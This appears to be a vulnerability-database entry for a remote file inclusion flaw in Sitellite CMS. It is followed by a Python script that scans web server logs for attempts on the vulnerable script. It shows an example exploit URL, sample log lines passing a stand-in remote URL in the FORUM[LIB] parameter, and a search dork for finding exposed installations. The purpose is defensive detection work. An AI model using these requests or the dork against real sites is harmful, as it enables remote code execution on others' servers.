CVE-2007-3228
published 2007-06-14

Priority: P351
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 67.46% (99.2th percentile)
PHP remote file inclusion vulnerability in saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php in Sitellite CMS 4.2.12 and earlier might allow remote attackers to execute arbitrary PHP code via a URL in the FORUM[LIB] parameter. NOTE: by default, access to the PhpDocumentor directory tree is blocked by .htaccess.

Affected (1 range)

Vendor | Product | Version range | Fixed in
simian_systems_inc | sitellite_cms | |

Detection & IOCs (extracted from sources)

path: saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php
url: xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
  • Detect HTTP requests targeting the vulnerable script path with a FORUM[LIB] parameter containing a remote URL, which indicates a remote file inclusion attempt.
  • Search web server logs for requests to '/saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php' or '559668.php' with a non-empty FORUM[LIB] query parameter; these should normally be blocked by .htaccess and any successful access is suspicious.
  • Fingerprint vulnerable Sitellite CMS installations via the Google dork 'powered by Sitellite' to identify exposed targets.
  • By default, the PhpDocumentor directory tree is protected by .htaccess, meaning the vulnerable file is not directly accessible in a default installation. Exploitation requires the .htaccess protection to be absent or bypassed.
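
The log search described in the detection notes above, as an added example (not code from this page or from the Sitellite project). It assumes Apache common/combined-format access logs; the function names, sample hosts and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names from the page: the full 'bug-559668.php' and the short '559668.php'.
SCRIPT_RE = re.compile(r"/(?:bug-)?559668\.php$", re.IGNORECASE)
# Any 'scheme://' value counts as a remote URL.
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Request line and status code of an Apache access-log entry (assumed format).
LINE_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

def classify(line):
    """Return a finding dict for a request to the script with FORUM[LIB] set, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not SCRIPT_RE.search(unquote(parts.path)):
        return None
    # parse_qsl percent-decodes names and values, so FORUM%5BLIB%5D also matches.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    value = params.get("FORUM[LIB]", "")
    if not value:
        return None
    status = int(m.group("status"))
    return {
        "status": status,
        "value": value,
        "remote_url": bool(REMOTE_RE.match(value)),
        # A 2xx response means the .htaccess block was absent or bypassed.
        "served": 200 <= status < 300,
    }

def scan(lines):
    """Return the findings for every matching line, in log order."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, example hostnames).
P = "/saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [14/Jun/2007:10:01:02 +0000] "GET {P}?FORUM[LIB]=http://remote.example/x.txt HTTP/1.1" 403 210',
    f'203.0.113.7 - - [14/Jun/2007:10:01:09 +0000] "GET {P}?FORUM%5BLIB%5D=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 5120',
    '198.51.100.4 - - [14/Jun/2007:10:02:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
    f'198.51.100.4 - - [14/Jun/2007:10:03:00 +0000] "GET {P} HTTP/1.1" 403 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("SERVED" if finding["served"] else "blocked", finding)
```

Findings with `served` set deserve the first look, since the notes above treat any successful access to this path as suspicious.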